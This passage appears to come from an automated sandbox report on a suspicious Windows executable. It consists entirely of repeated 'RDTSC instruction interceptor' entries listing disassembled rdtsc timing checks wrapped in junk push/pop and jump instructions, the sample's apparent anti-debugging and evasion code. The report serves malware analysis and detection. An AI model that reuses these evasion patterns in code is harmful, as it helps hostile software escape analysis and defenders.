Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1580621 second address: 1580627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1580627 second address: 158063A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F6FA52293BDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1580905 second address: 1580909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1580909 second address: 158090F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 158090F second address: 1580914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1580914 second address: 158091A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1580C68 second address: 1580C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F6FA4524822h 0x0000000b jmp 00007F6FA4524829h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15814B2 second address: 15814C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1585B2C second address: 1585B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6FA4524816h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1585B38 second address: 1585B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6FA52293B6h 0x0000000a popad 0x0000000b pushad 0x0000000c jng 00007F6FA52293B6h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1585B4E second address: 1585B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F6FA4524829h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 14D29CB second address: 14D29E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F6FA52293C7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 14D29E8 second address: 14D2A09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524828h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15850EF second address: 15850F9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6FA52293B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15850F9 second address: 1585102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1585102 second address: 1585108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1585108 second address: 1585119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push edx 0x00000009 jl 00007F6FA452481Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 158558C second address: 1585592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1585592 second address: 1585598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1585598 second address: 158559C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 158587C second address: 1585899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 jbe 00007F6FA4524816h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 jmp 00007F6FA452481Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1585899 second address: 15858C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6FA52293BEh 0x00000008 jmp 00007F6FA52293C9h 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15858C7 second address: 15858CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 158A15C second address: 158A160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 158C36F second address: 158C375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 158C375 second address: 158C37E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 158C37E second address: 158C382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1593B2F second address: 1593B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1593B35 second address: 1593B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1593B3A second address: 1593B68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F6FA52293C8h 0x00000011 pop edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1593B68 second address: 1593B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1593B6F second address: 1593B8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1593B8E second address: 1593B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1593B92 second address: 1593B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 14E4FC9 second address: 14E4FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1591E4B second address: 1591E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1591E56 second address: 1591E60 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6FA4524816h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15920DA second address: 1592108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BDh 0x00000007 jmp 00007F6FA52293C7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1592108 second address: 1592123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA4524827h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1592123 second address: 159214C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6FA52293BEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 159214C second address: 1592163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F6FA452481Bh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1592163 second address: 1592167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1592167 second address: 159216B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15922A9 second address: 15922DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C5h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e jnp 00007F6FA52293B6h 0x00000014 jmp 00007F6FA52293C0h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1592409 second address: 159244C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007F6FA4524816h 0x0000000c jmp 00007F6FA452481Eh 0x00000011 popad 0x00000012 jmp 00007F6FA4524822h 0x00000017 jns 00007F6FA452481Ch 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ecx 0x00000021 push eax 0x00000022 pop eax 0x00000023 pop ecx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 159244C second address: 1592463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6FA52293C0h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15925C3 second address: 1592600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524829h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F6FA4524821h 0x00000011 pushad 0x00000012 popad 0x00000013 jns 00007F6FA4524816h 0x00000019 popad 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 159273C second address: 1592741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15929DF second address: 1592A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA452481Bh 0x00000009 popad 0x0000000a jmp 00007F6FA4524828h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1592A07 second address: 1592A11 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6FA52293BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15932D6 second address: 15932DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15932DA second address: 15932E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15932E6 second address: 15932EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15932EA second address: 15932EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15932EE second address: 15932F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15932F4 second address: 1593304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1593304 second address: 159330B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 159B4BD second address: 159B4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293BCh 0x00000009 pop edx 0x0000000a jnp 00007F6FA52293BEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 159B4D8 second address: 159B4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 159B4DC second address: 159B4FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F6FA52293B6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 159B4FF second address: 159B503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 159B503 second address: 159B513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F6FA52293B6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 159B513 second address: 159B519 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 159B519 second address: 159B523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 159B523 second address: 159B529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 159B529 second address: 159B52D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 159B52D second address: 159B533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15A5AD8 second address: 15A5ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15A5ADD second address: 15A5AE2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15A5AE2 second address: 15A5AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15A5AED second address: 15A5B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA4524829h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15A5B0A second address: 15A5B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15A835E second address: 15A8395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524821h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F6FA4524827h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15A8395 second address: 15A839B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15A7E6B second address: 15A7E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6FA4524816h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15A7E75 second address: 15A7E7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15AAA35 second address: 15AAA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F6FA4524827h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 jne 00007F6FA452481Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15AA876 second address: 15AA885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F6FA52293B6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15AA885 second address: 15AA8A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524825h 0x00000007 jnp 00007F6FA4524816h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15AEAAB second address: 15AEAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15AEAB1 second address: 15AEAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15B40B7 second address: 15B40BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15B40BD second address: 15B40C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15B56E6 second address: 15B56F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA52293BDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15B56F9 second address: 15B56FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15B56FD second address: 15B5701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15B5701 second address: 15B5713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F6FA4524831h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15BB5B2 second address: 15BB5C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15BFF62 second address: 15BFF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15BFF68 second address: 15BFF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15BFF6F second address: 15BFF7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F6FA4524816h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15BFF7B second address: 15BFF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15BFF7F second address: 15BFF83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15BFDAB second address: 15BFDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 ja 00007F6FA52293B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15C67E4 second address: 15C67EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15C6A59 second address: 15C6A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15C6A62 second address: 15C6A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15C6BFC second address: 15C6C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15C6FCA second address: 15C6FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
